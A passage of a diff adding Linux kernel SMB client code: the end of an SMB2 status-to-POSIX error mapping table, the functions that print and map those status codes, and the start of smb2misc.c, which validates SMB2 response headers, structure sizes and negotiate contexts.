++	{STATUS_GRAPHICS_I2C_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_I2C_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST, -EIO,
++	"STATUS_GRAPHICS_I2C_DEVICE_DOES_NOT_EXIST"},
++	{STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA, -EIO,
++	"STATUS_GRAPHICS_I2C_ERROR_TRANSMITTING_DATA"},
++	{STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA, -EIO,
++	"STATUS_GRAPHICS_I2C_ERROR_RECEIVING_DATA"},
++	{STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_DDCCI_VCP_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_DATA, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_DATA"},
++	{STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE,
++	-EIO,
++	"STATUS_GRAPHICS_DDCCI_MONITOR_RETURNED_INVALID_TIMING_STATUS_BYTE"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_CAPABILITIES_STRING"},
++	{STATUS_GRAPHICS_MCA_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_MCA_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_COMMAND"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_LENGTH"},
++	{STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM, -EIO,
++	"STATUS_GRAPHICS_DDCCI_INVALID_MESSAGE_CHECKSUM"},
++	{STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE, -EIO,
++	"STATUS_GRAPHICS_INVALID_PHYSICAL_MONITOR_HANDLE"},
++	{STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS, -EIO,
++	"STATUS_GRAPHICS_MONITOR_NO_LONGER_EXISTS"},
++	{STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_ONLY_CONSOLE_SESSION_SUPPORTED"},
++	{STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME, -EIO,
++	"STATUS_GRAPHICS_NO_DISPLAY_DEVICE_CORRESPONDS_TO_NAME"},
++	{STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP, -EIO,
++	"STATUS_GRAPHICS_DISPLAY_DEVICE_NOT_ATTACHED_TO_DESKTOP"},
++	{STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED, -EIO,
++	"STATUS_GRAPHICS_MIRRORING_DEVICES_NOT_SUPPORTED"},
++	{STATUS_GRAPHICS_INVALID_POINTER, -EIO,
++	"STATUS_GRAPHICS_INVALID_POINTER"},
++	{STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE, -EIO,
++	"STATUS_GRAPHICS_NO_MONITORS_CORRESPOND_TO_DISPLAY_DEVICE"},
++	{STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL, -EIO,
++	"STATUS_GRAPHICS_PARAMETER_ARRAY_TOO_SMALL"},
++	{STATUS_GRAPHICS_INTERNAL_ERROR, -EIO,
++	"STATUS_GRAPHICS_INTERNAL_ERROR"},
++	{STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS, -EIO,
++	"STATUS_GRAPHICS_SESSION_TYPE_CHANGE_IN_PROGRESS"},
++	{STATUS_FVE_LOCKED_VOLUME, -EIO, "STATUS_FVE_LOCKED_VOLUME"},
++	{STATUS_FVE_NOT_ENCRYPTED, -EIO, "STATUS_FVE_NOT_ENCRYPTED"},
++	{STATUS_FVE_BAD_INFORMATION, -EIO, "STATUS_FVE_BAD_INFORMATION"},
++	{STATUS_FVE_TOO_SMALL, -EIO, "STATUS_FVE_TOO_SMALL"},
++	{STATUS_FVE_FAILED_WRONG_FS, -EIO, "STATUS_FVE_FAILED_WRONG_FS"},
++	{STATUS_FVE_FAILED_BAD_FS, -EIO, "STATUS_FVE_FAILED_BAD_FS"},
++	{STATUS_FVE_FS_NOT_EXTENDED, -EIO, "STATUS_FVE_FS_NOT_EXTENDED"},
++	{STATUS_FVE_FS_MOUNTED, -EIO, "STATUS_FVE_FS_MOUNTED"},
++	{STATUS_FVE_NO_LICENSE, -EIO, "STATUS_FVE_NO_LICENSE"},
++	{STATUS_FVE_ACTION_NOT_ALLOWED, -EIO, "STATUS_FVE_ACTION_NOT_ALLOWED"},
++	{STATUS_FVE_BAD_DATA, -EIO, "STATUS_FVE_BAD_DATA"},
++	{STATUS_FVE_VOLUME_NOT_BOUND, -EIO, "STATUS_FVE_VOLUME_NOT_BOUND"},
++	{STATUS_FVE_NOT_DATA_VOLUME, -EIO, "STATUS_FVE_NOT_DATA_VOLUME"},
++	{STATUS_FVE_CONV_READ_ERROR, -EIO, "STATUS_FVE_CONV_READ_ERROR"},
++	{STATUS_FVE_CONV_WRITE_ERROR, -EIO, "STATUS_FVE_CONV_WRITE_ERROR"},
++	{STATUS_FVE_OVERLAPPED_UPDATE, -EIO, "STATUS_FVE_OVERLAPPED_UPDATE"},
++	{STATUS_FVE_FAILED_SECTOR_SIZE, -EIO, "STATUS_FVE_FAILED_SECTOR_SIZE"},
++	{STATUS_FVE_FAILED_AUTHENTICATION, -EIO,
++	"STATUS_FVE_FAILED_AUTHENTICATION"},
++	{STATUS_FVE_NOT_OS_VOLUME, -EIO, "STATUS_FVE_NOT_OS_VOLUME"},
++	{STATUS_FVE_KEYFILE_NOT_FOUND, -EIO, "STATUS_FVE_KEYFILE_NOT_FOUND"},
++	{STATUS_FVE_KEYFILE_INVALID, -EIO, "STATUS_FVE_KEYFILE_INVALID"},
++	{STATUS_FVE_KEYFILE_NO_VMK, -EIO, "STATUS_FVE_KEYFILE_NO_VMK"},
++	{STATUS_FVE_TPM_DISABLED, -EIO, "STATUS_FVE_TPM_DISABLED"},
++	{STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO, -EIO,
++	"STATUS_FVE_TPM_SRK_AUTH_NOT_ZERO"},
++	{STATUS_FVE_TPM_INVALID_PCR, -EIO, "STATUS_FVE_TPM_INVALID_PCR"},
++	{STATUS_FVE_TPM_NO_VMK, -EIO, "STATUS_FVE_TPM_NO_VMK"},
++	{STATUS_FVE_PIN_INVALID, -EIO, "STATUS_FVE_PIN_INVALID"},
++	{STATUS_FVE_AUTH_INVALID_APPLICATION, -EIO,
++	"STATUS_FVE_AUTH_INVALID_APPLICATION"},
++	{STATUS_FVE_AUTH_INVALID_CONFIG, -EIO,
++	"STATUS_FVE_AUTH_INVALID_CONFIG"},
++	{STATUS_FVE_DEBUGGER_ENABLED, -EIO, "STATUS_FVE_DEBUGGER_ENABLED"},
++	{STATUS_FVE_DRY_RUN_FAILED, -EIO, "STATUS_FVE_DRY_RUN_FAILED"},
++	{STATUS_FVE_BAD_METADATA_POINTER, -EIO,
++	"STATUS_FVE_BAD_METADATA_POINTER"},
++	{STATUS_FVE_OLD_METADATA_COPY, -EIO, "STATUS_FVE_OLD_METADATA_COPY"},
++	{STATUS_FVE_REBOOT_REQUIRED, -EIO, "STATUS_FVE_REBOOT_REQUIRED"},
++	{STATUS_FVE_RAW_ACCESS, -EIO, "STATUS_FVE_RAW_ACCESS"},
++	{STATUS_FVE_RAW_BLOCKED, -EIO, "STATUS_FVE_RAW_BLOCKED"},
++	{STATUS_FWP_CALLOUT_NOT_FOUND, -EIO, "STATUS_FWP_CALLOUT_NOT_FOUND"},
++	{STATUS_FWP_CONDITION_NOT_FOUND, -EIO,
++	"STATUS_FWP_CONDITION_NOT_FOUND"},
++	{STATUS_FWP_FILTER_NOT_FOUND, -EIO, "STATUS_FWP_FILTER_NOT_FOUND"},
++	{STATUS_FWP_LAYER_NOT_FOUND, -EIO, "STATUS_FWP_LAYER_NOT_FOUND"},
++	{STATUS_FWP_PROVIDER_NOT_FOUND, -EIO, "STATUS_FWP_PROVIDER_NOT_FOUND"},
++	{STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND, -EIO,
++	"STATUS_FWP_PROVIDER_CONTEXT_NOT_FOUND"},
++	{STATUS_FWP_SUBLAYER_NOT_FOUND, -EIO, "STATUS_FWP_SUBLAYER_NOT_FOUND"},
++	{STATUS_FWP_NOT_FOUND, -EIO, "STATUS_FWP_NOT_FOUND"},
++	{STATUS_FWP_ALREADY_EXISTS, -EIO, "STATUS_FWP_ALREADY_EXISTS"},
++	{STATUS_FWP_IN_USE, -EIO, "STATUS_FWP_IN_USE"},
++	{STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS, -EIO,
++	"STATUS_FWP_DYNAMIC_SESSION_IN_PROGRESS"},
++	{STATUS_FWP_WRONG_SESSION, -EIO, "STATUS_FWP_WRONG_SESSION"},
++	{STATUS_FWP_NO_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_NO_TXN_IN_PROGRESS"},
++	{STATUS_FWP_TXN_IN_PROGRESS, -EIO, "STATUS_FWP_TXN_IN_PROGRESS"},
++	{STATUS_FWP_TXN_ABORTED, -EIO, "STATUS_FWP_TXN_ABORTED"},
++	{STATUS_FWP_SESSION_ABORTED, -EIO, "STATUS_FWP_SESSION_ABORTED"},
++	{STATUS_FWP_INCOMPATIBLE_TXN, -EIO, "STATUS_FWP_INCOMPATIBLE_TXN"},
++	{STATUS_FWP_TIMEOUT, -ETIMEDOUT, "STATUS_FWP_TIMEOUT"},
++	{STATUS_FWP_NET_EVENTS_DISABLED, -EIO,
++	"STATUS_FWP_NET_EVENTS_DISABLED"},
++	{STATUS_FWP_INCOMPATIBLE_LAYER, -EIO, "STATUS_FWP_INCOMPATIBLE_LAYER"},
++	{STATUS_FWP_KM_CLIENTS_ONLY, -EIO, "STATUS_FWP_KM_CLIENTS_ONLY"},
++	{STATUS_FWP_LIFETIME_MISMATCH, -EIO, "STATUS_FWP_LIFETIME_MISMATCH"},
++	{STATUS_FWP_BUILTIN_OBJECT, -EIO, "STATUS_FWP_BUILTIN_OBJECT"},
++	{STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS, -EIO,
++	"STATUS_FWP_TOO_MANY_BOOTTIME_FILTERS"},
++	{STATUS_FWP_TOO_MANY_CALLOUTS, -EIO, "STATUS_FWP_TOO_MANY_CALLOUTS"},
++	{STATUS_FWP_NOTIFICATION_DROPPED, -EIO,
++	"STATUS_FWP_NOTIFICATION_DROPPED"},
++	{STATUS_FWP_TRAFFIC_MISMATCH, -EIO, "STATUS_FWP_TRAFFIC_MISMATCH"},
++	{STATUS_FWP_INCOMPATIBLE_SA_STATE, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_SA_STATE"},
++	{STATUS_FWP_NULL_POINTER, -EIO, "STATUS_FWP_NULL_POINTER"},
++	{STATUS_FWP_INVALID_ENUMERATOR, -EIO, "STATUS_FWP_INVALID_ENUMERATOR"},
++	{STATUS_FWP_INVALID_FLAGS, -EIO, "STATUS_FWP_INVALID_FLAGS"},
++	{STATUS_FWP_INVALID_NET_MASK, -EIO, "STATUS_FWP_INVALID_NET_MASK"},
++	{STATUS_FWP_INVALID_RANGE, -EIO, "STATUS_FWP_INVALID_RANGE"},
++	{STATUS_FWP_INVALID_INTERVAL, -EIO, "STATUS_FWP_INVALID_INTERVAL"},
++	{STATUS_FWP_ZERO_LENGTH_ARRAY, -EIO, "STATUS_FWP_ZERO_LENGTH_ARRAY"},
++	{STATUS_FWP_NULL_DISPLAY_NAME, -EIO, "STATUS_FWP_NULL_DISPLAY_NAME"},
++	{STATUS_FWP_INVALID_ACTION_TYPE, -EIO,
++	"STATUS_FWP_INVALID_ACTION_TYPE"},
++	{STATUS_FWP_INVALID_WEIGHT, -EIO, "STATUS_FWP_INVALID_WEIGHT"},
++	{STATUS_FWP_MATCH_TYPE_MISMATCH, -EIO,
++	"STATUS_FWP_MATCH_TYPE_MISMATCH"},
++	{STATUS_FWP_TYPE_MISMATCH, -EIO, "STATUS_FWP_TYPE_MISMATCH"},
++	{STATUS_FWP_OUT_OF_BOUNDS, -EIO, "STATUS_FWP_OUT_OF_BOUNDS"},
++	{STATUS_FWP_RESERVED, -EIO, "STATUS_FWP_RESERVED"},
++	{STATUS_FWP_DUPLICATE_CONDITION, -EIO,
++	"STATUS_FWP_DUPLICATE_CONDITION"},
++	{STATUS_FWP_DUPLICATE_KEYMOD, -EIO, "STATUS_FWP_DUPLICATE_KEYMOD"},
++	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER, -EIO,
++	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_LAYER"},
++	{STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER, -EIO,
++	"STATUS_FWP_ACTION_INCOMPATIBLE_WITH_SUBLAYER"},
++	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER, -EIO,
++	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_LAYER"},
++	{STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT, -EIO,
++	"STATUS_FWP_CONTEXT_INCOMPATIBLE_WITH_CALLOUT"},
++	{STATUS_FWP_INCOMPATIBLE_AUTH_METHOD, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_AUTH_METHOD"},
++	{STATUS_FWP_INCOMPATIBLE_DH_GROUP, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_DH_GROUP"},
++	{STATUS_FWP_EM_NOT_SUPPORTED, -EOPNOTSUPP,
++	"STATUS_FWP_EM_NOT_SUPPORTED"},
++	{STATUS_FWP_NEVER_MATCH, -EIO, "STATUS_FWP_NEVER_MATCH"},
++	{STATUS_FWP_PROVIDER_CONTEXT_MISMATCH, -EIO,
++	"STATUS_FWP_PROVIDER_CONTEXT_MISMATCH"},
++	{STATUS_FWP_INVALID_PARAMETER, -EIO, "STATUS_FWP_INVALID_PARAMETER"},
++	{STATUS_FWP_TOO_MANY_SUBLAYERS, -EIO, "STATUS_FWP_TOO_MANY_SUBLAYERS"},
++	{STATUS_FWP_CALLOUT_NOTIFICATION_FAILED, -EIO,
++	"STATUS_FWP_CALLOUT_NOTIFICATION_FAILED"},
++	{STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_AUTH_CONFIG"},
++	{STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG, -EIO,
++	"STATUS_FWP_INCOMPATIBLE_CIPHER_CONFIG"},
++	{STATUS_FWP_TCPIP_NOT_READY, -EIO, "STATUS_FWP_TCPIP_NOT_READY"},
++	{STATUS_FWP_INJECT_HANDLE_CLOSING, -EIO,
++	"STATUS_FWP_INJECT_HANDLE_CLOSING"},
++	{STATUS_FWP_INJECT_HANDLE_STALE, -EIO,
++	"STATUS_FWP_INJECT_HANDLE_STALE"},
++	{STATUS_FWP_CANNOT_PEND, -EIO, "STATUS_FWP_CANNOT_PEND"},
++	{STATUS_NDIS_CLOSING, -EIO, "STATUS_NDIS_CLOSING"},
++	{STATUS_NDIS_BAD_VERSION, -EIO, "STATUS_NDIS_BAD_VERSION"},
++	{STATUS_NDIS_BAD_CHARACTERISTICS, -EIO,
++	"STATUS_NDIS_BAD_CHARACTERISTICS"},
++	{STATUS_NDIS_ADAPTER_NOT_FOUND, -EIO, "STATUS_NDIS_ADAPTER_NOT_FOUND"},
++	{STATUS_NDIS_OPEN_FAILED, -EIO, "STATUS_NDIS_OPEN_FAILED"},
++	{STATUS_NDIS_DEVICE_FAILED, -EIO, "STATUS_NDIS_DEVICE_FAILED"},
++	{STATUS_NDIS_MULTICAST_FULL, -EIO, "STATUS_NDIS_MULTICAST_FULL"},
++	{STATUS_NDIS_MULTICAST_EXISTS, -EIO, "STATUS_NDIS_MULTICAST_EXISTS"},
++	{STATUS_NDIS_MULTICAST_NOT_FOUND, -EIO,
++	"STATUS_NDIS_MULTICAST_NOT_FOUND"},
++	{STATUS_NDIS_REQUEST_ABORTED, -EIO, "STATUS_NDIS_REQUEST_ABORTED"},
++	{STATUS_NDIS_RESET_IN_PROGRESS, -EIO, "STATUS_NDIS_RESET_IN_PROGRESS"},
++	{STATUS_NDIS_INVALID_PACKET, -EIO, "STATUS_NDIS_INVALID_PACKET"},
++	{STATUS_NDIS_INVALID_DEVICE_REQUEST, -EIO,
++	"STATUS_NDIS_INVALID_DEVICE_REQUEST"},
++	{STATUS_NDIS_ADAPTER_NOT_READY, -EIO, "STATUS_NDIS_ADAPTER_NOT_READY"},
++	{STATUS_NDIS_INVALID_LENGTH, -EIO, "STATUS_NDIS_INVALID_LENGTH"},
++	{STATUS_NDIS_INVALID_DATA, -EIO, "STATUS_NDIS_INVALID_DATA"},
++	{STATUS_NDIS_BUFFER_TOO_SHORT, -ENOBUFS,
++	"STATUS_NDIS_BUFFER_TOO_SHORT"},
++	{STATUS_NDIS_INVALID_OID, -EIO, "STATUS_NDIS_INVALID_OID"},
++	{STATUS_NDIS_ADAPTER_REMOVED, -EIO, "STATUS_NDIS_ADAPTER_REMOVED"},
++	{STATUS_NDIS_UNSUPPORTED_MEDIA, -EIO, "STATUS_NDIS_UNSUPPORTED_MEDIA"},
++	{STATUS_NDIS_GROUP_ADDRESS_IN_USE, -EIO,
++	"STATUS_NDIS_GROUP_ADDRESS_IN_USE"},
++	{STATUS_NDIS_FILE_NOT_FOUND, -EIO, "STATUS_NDIS_FILE_NOT_FOUND"},
++	{STATUS_NDIS_ERROR_READING_FILE, -EIO,
++	"STATUS_NDIS_ERROR_READING_FILE"},
++	{STATUS_NDIS_ALREADY_MAPPED, -EIO, "STATUS_NDIS_ALREADY_MAPPED"},
++	{STATUS_NDIS_RESOURCE_CONFLICT, -EIO, "STATUS_NDIS_RESOURCE_CONFLICT"},
++	{STATUS_NDIS_MEDIA_DISCONNECTED, -EIO,
++	"STATUS_NDIS_MEDIA_DISCONNECTED"},
++	{STATUS_NDIS_INVALID_ADDRESS, -EIO, "STATUS_NDIS_INVALID_ADDRESS"},
++	{STATUS_NDIS_PAUSED, -EIO, "STATUS_NDIS_PAUSED"},
++	{STATUS_NDIS_INTERFACE_NOT_FOUND, -EIO,
++	"STATUS_NDIS_INTERFACE_NOT_FOUND"},
++	{STATUS_NDIS_UNSUPPORTED_REVISION, -EIO,
++	"STATUS_NDIS_UNSUPPORTED_REVISION"},
++	{STATUS_NDIS_INVALID_PORT, -EIO, "STATUS_NDIS_INVALID_PORT"},
++	{STATUS_NDIS_INVALID_PORT_STATE, -EIO,
++	"STATUS_NDIS_INVALID_PORT_STATE"},
++	{STATUS_NDIS_LOW_POWER_STATE, -EIO, "STATUS_NDIS_LOW_POWER_STATE"},
++	{STATUS_NDIS_NOT_SUPPORTED, -ENOSYS, "STATUS_NDIS_NOT_SUPPORTED"},
++	{STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED, -EIO,
++	"STATUS_NDIS_DOT11_AUTO_CONFIG_ENABLED"},
++	{STATUS_NDIS_DOT11_MEDIA_IN_USE, -EIO,
++	"STATUS_NDIS_DOT11_MEDIA_IN_USE"},
++	{STATUS_NDIS_DOT11_POWER_STATE_INVALID, -EIO,
++	"STATUS_NDIS_DOT11_POWER_STATE_INVALID"},
++	{STATUS_IPSEC_BAD_SPI, -EIO, "STATUS_IPSEC_BAD_SPI"},
++	{STATUS_IPSEC_SA_LIFETIME_EXPIRED, -EIO,
++	"STATUS_IPSEC_SA_LIFETIME_EXPIRED"},
++	{STATUS_IPSEC_WRONG_SA, -EIO, "STATUS_IPSEC_WRONG_SA"},
++	{STATUS_IPSEC_REPLAY_CHECK_FAILED, -EIO,
++	"STATUS_IPSEC_REPLAY_CHECK_FAILED"},
++	{STATUS_IPSEC_INVALID_PACKET, -EIO, "STATUS_IPSEC_INVALID_PACKET"},
++	{STATUS_IPSEC_INTEGRITY_CHECK_FAILED, -EIO,
++	"STATUS_IPSEC_INTEGRITY_CHECK_FAILED"},
++	{STATUS_IPSEC_CLEAR_TEXT_DROP, -EIO, "STATUS_IPSEC_CLEAR_TEXT_DROP"},
++	{0, 0, NULL}
++};
++
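++/*
++ * Note: the map above ends with a {0, 0, NULL} sentinel entry, which is how
++ * smb2_print_status() below detects the end of the table; status codes with
++ * no entry fall back to the generic -EIO default in map_smb2_to_linux_error().
++ */
++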
++/*****************************************************************************
++ Print an error message from the status code
++ *****************************************************************************/
++static void
++smb2_print_status(__le32 status)
++{
++	int idx = 0;
++
++	while (smb2_error_map_table[idx].status_string != NULL) {
++		if ((smb2_error_map_table[idx].smb2_status) == status) {
++			pr_notice("Status code returned 0x%08x %s\n", status,
++				  smb2_error_map_table[idx].status_string);
++		}
++		idx++;
++	}
++	return;
++}
++
++int
++map_smb2_to_linux_error(char *buf, bool log_err)
++{
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	unsigned int i;
++	int rc = -EIO;
++	__le32 smb2err = shdr->Status;
++
++	if (smb2err == 0) {
++		trace_smb3_cmd_done(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			      le64_to_cpu(shdr->SessionId),
++			      le16_to_cpu(shdr->Command),
++			      le64_to_cpu(shdr->MessageId));
++		return 0;
++	}
++
++	/* mask facility */
++	if (log_err && (smb2err != STATUS_MORE_PROCESSING_REQUIRED) &&
++	    (smb2err != STATUS_END_OF_FILE))
++		smb2_print_status(smb2err);
++	else if (cifsFYI & CIFS_RC)
++		smb2_print_status(smb2err);
++
++	for (i = 0; i < sizeof(smb2_error_map_table) /
++			sizeof(struct status_to_posix_error); i++) {
++		if (smb2_error_map_table[i].smb2_status == smb2err) {
++			rc = smb2_error_map_table[i].posix_error;
++			break;
++		}
++	}
++
++	/* if no mapping was found above, fall back to the -EIO default */
++
++	cifs_dbg(FYI, "Mapping SMB2 status code 0x%08x to POSIX err %d\n",
++		 __le32_to_cpu(smb2err), rc);
++
++	trace_smb3_cmd_err(le32_to_cpu(shdr->Id.SyncId.TreeId),
++			   le64_to_cpu(shdr->SessionId),
++			   le16_to_cpu(shdr->Command),
++			   le64_to_cpu(shdr->MessageId),
++			   le32_to_cpu(smb2err), rc);
++	return rc;
++}
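++
++/*
++ * Minimal usage sketch (hypothetical caller, for illustration only): a
++ * response processor would call map_smb2_to_linux_error(rsp_buf, true) and
++ * propagate the result, which is 0 on server success or a negative POSIX
++ * errno (e.g. -EACCES, -ETIMEDOUT, or the -EIO default) on failure.
++ */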
+diff --git a/fs/smb/client/smb2misc.c b/fs/smb/client/smb2misc.c
+new file mode 100644
+index 0000000000000..572293c18e16f
+--- /dev/null
++++ b/fs/smb/client/smb2misc.c
+@@ -0,0 +1,944 @@
++// SPDX-License-Identifier: LGPL-2.1
++/*
++ *
++ *   Copyright (C) International Business Machines  Corp., 2002,2011
++ *                 Etersoft, 2012
++ *   Author(s): Steve French (sfrench@us.ibm.com)
++ *              Pavel Shilovsky (pshilovsky@samba.org) 2012
++ *
++ */
++#include <linux/ctype.h>
++#include "cifsglob.h"
++#include "cifsproto.h"
++#include "smb2proto.h"
++#include "cifs_debug.h"
++#include "cifs_unicode.h"
++#include "smb2status.h"
++#include "smb2glob.h"
++#include "nterr.h"
++#include "cached_dir.h"
++
++static int
++check_smb2_hdr(struct smb2_hdr *shdr, __u64 mid)
++{
++	__u64 wire_mid = le64_to_cpu(shdr->MessageId);
++
++	/*
++	 * Make sure that this really is an SMB, that it is a response,
++	 * and that the message ids match.
++	 */
++	if ((shdr->ProtocolId == SMB2_PROTO_NUMBER) &&
++	    (mid == wire_mid)) {
++		if (shdr->Flags & SMB2_FLAGS_SERVER_TO_REDIR)
++			return 0;
++		else {
++			/* only one valid case where server sends us request */
++			if (shdr->Command == SMB2_OPLOCK_BREAK)
++				return 0;
++			else
++				cifs_dbg(VFS, "Received Request not response\n");
++		}
++	} else { /* bad signature or mid */
++		if (shdr->ProtocolId != SMB2_PROTO_NUMBER)
++			cifs_dbg(VFS, "Bad protocol string signature header %x\n",
++				 le32_to_cpu(shdr->ProtocolId));
++		if (mid != wire_mid)
++			cifs_dbg(VFS, "Mids do not match: %llu and %llu\n",
++				 mid, wire_mid);
++	}
++	cifs_dbg(VFS, "Bad SMB detected. The Mid=%llu\n", wire_mid);
++	return 1;
++}
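++
++/*
++ * Note: as with smb2_check_message() below, check_smb2_hdr() returns 0 when
++ * the header looks valid and 1 (not a negative errno) when the frame is
++ * malformed.
++ */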
++
++/*
++ *  The following table defines the expected "StructureSize" of SMB2 responses
++ *  in order by SMB2 command.  This is similar to "wct" in SMB/CIFS responses.
++ *
++ *  Note that commands are defined in smb2pdu.h in le16 but the array below is
++ *  indexed by command in host byte order
++ */
++static const __le16 smb2_rsp_struct_sizes[NUMBER_OF_SMB2_COMMANDS] = {
++	/* SMB2_NEGOTIATE */ cpu_to_le16(65),
++	/* SMB2_SESSION_SETUP */ cpu_to_le16(9),
++	/* SMB2_LOGOFF */ cpu_to_le16(4),
++	/* SMB2_TREE_CONNECT */ cpu_to_le16(16),
++	/* SMB2_TREE_DISCONNECT */ cpu_to_le16(4),
++	/* SMB2_CREATE */ cpu_to_le16(89),
++	/* SMB2_CLOSE */ cpu_to_le16(60),
++	/* SMB2_FLUSH */ cpu_to_le16(4),
++	/* SMB2_READ */ cpu_to_le16(17),
++	/* SMB2_WRITE */ cpu_to_le16(17),
++	/* SMB2_LOCK */ cpu_to_le16(4),
++	/* SMB2_IOCTL */ cpu_to_le16(49),
++	/* BB CHECK this ... not listed in documentation */
++	/* SMB2_CANCEL */ cpu_to_le16(0),
++	/* SMB2_ECHO */ cpu_to_le16(4),
++	/* SMB2_QUERY_DIRECTORY */ cpu_to_le16(9),
++	/* SMB2_CHANGE_NOTIFY */ cpu_to_le16(9),
++	/* SMB2_QUERY_INFO */ cpu_to_le16(9),
++	/* SMB2_SET_INFO */ cpu_to_le16(2),
++	/* BB FIXME can also be 44 for lease break */
++	/* SMB2_OPLOCK_BREAK */ cpu_to_le16(24)
++};
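++
++/*
++ * For example, a well-formed SMB2_READ response must carry StructureSize2 of
++ * 17 per the table above, while error responses instead use the fixed 9-byte
++ * SMB2_ERROR_STRUCTURE_SIZE2_LE layout that smb2_check_message() accepts
++ * separately.
++ */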
++
++#define SMB311_NEGPROT_BASE_SIZE (sizeof(struct smb2_hdr) + sizeof(struct smb2_negotiate_rsp))
++
++static __u32 get_neg_ctxt_len(struct smb2_hdr *hdr, __u32 len,
++			      __u32 non_ctxlen)
++{
++	__u16 neg_count;
++	__u32 nc_offset, size_of_pad_before_neg_ctxts;
++	struct smb2_negotiate_rsp *pneg_rsp = (struct smb2_negotiate_rsp *)hdr;
++
++	/* Negotiate contexts are only valid for latest dialect SMB3.11 */
++	neg_count = le16_to_cpu(pneg_rsp->NegotiateContextCount);
++	if ((neg_count == 0) ||
++	   (pneg_rsp->DialectRevision != cpu_to_le16(SMB311_PROT_ID)))
++		return 0;
++
++	/*
++	 * If an SPNEGO blob is present (i.e. the RFC 2478 GSS info that
++	 * indicates which security mechanisms the server supports), make sure
++	 * that the negotiate contexts start after it.
++	 */
++	nc_offset = le32_to_cpu(pneg_rsp->NegotiateContextOffset);
++	/*
++	 * non_ctxlen is at least shdr->StructureSize + pdu->StructureSize2
++	 * and the latter is 1 byte bigger than the fixed-size area of the
++	 * NEGOTIATE response
++	 */
++	if (nc_offset + 1 < non_ctxlen) {
++		pr_warn_once("Invalid negotiate context offset %d\n", nc_offset);
++		return 0;
++	} else if (nc_offset + 1 == non_ctxlen) {
++		cifs_dbg(FYI, "no SPNEGO security blob in negprot rsp\n");
++		size_of_pad_before_neg_ctxts = 0;
++	} else if (non_ctxlen == SMB311_NEGPROT_BASE_SIZE)
++		/* has padding, but no SPNEGO blob */
++		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen + 1;
++	else
++		size_of_pad_before_neg_ctxts = nc_offset - non_ctxlen;
++
++	/* Verify that at least minimal negotiate contexts fit within frame */
++	if (len < nc_offset + (neg_count * sizeof(struct smb2_neg_context))) {
++		pr_warn_once("negotiate context goes beyond end\n");
++		return 0;
++	}
++
++	cifs_dbg(FYI, "length of negcontexts %d pad %d\n",
++		len - nc_offset, size_of_pad_before_neg_ctxts);
++
++	/* length of negcontexts including pad from end of sec blob to them */
++	return (len - nc_offset) + size_of_pad_before_neg_ctxts;
++}
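++
++/*
++ * Frame layout assumed by the helper above for an SMB3.1.1 NEGOTIATE
++ * response:
++ *
++ *	[smb2_hdr][fixed negotiate body][SPNEGO blob][pad][negotiate contexts]
++ *
++ * NegotiateContextOffset points at the first context, so the value returned
++ * is the length of the context area plus any pad between the end of the
++ * security blob and that first context.
++ */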
++
++int
++smb2_check_message(char *buf, unsigned int len, struct TCP_Server_Info *server)
++{
++	struct TCP_Server_Info *pserver;
++	struct smb2_hdr *shdr = (struct smb2_hdr *)buf;
++	struct smb2_pdu *pdu = (struct smb2_pdu *)shdr;
++	int hdr_size = sizeof(struct smb2_hdr);
++	int pdu_size = sizeof(struct smb2_pdu);
++	int command;
++	__u32 calc_len; /* calculated length */
++	__u64 mid;
++
++	/* If server is a channel, select the primary channel */
++	pserver = CIFS_SERVER_IS_CHAN(server) ? server->primary_server : server;
++
++	/*
++	 * Add function to do table lookup of StructureSize by command
++	 * ie Validate the wct via smb2_struct_sizes table above
++	 */
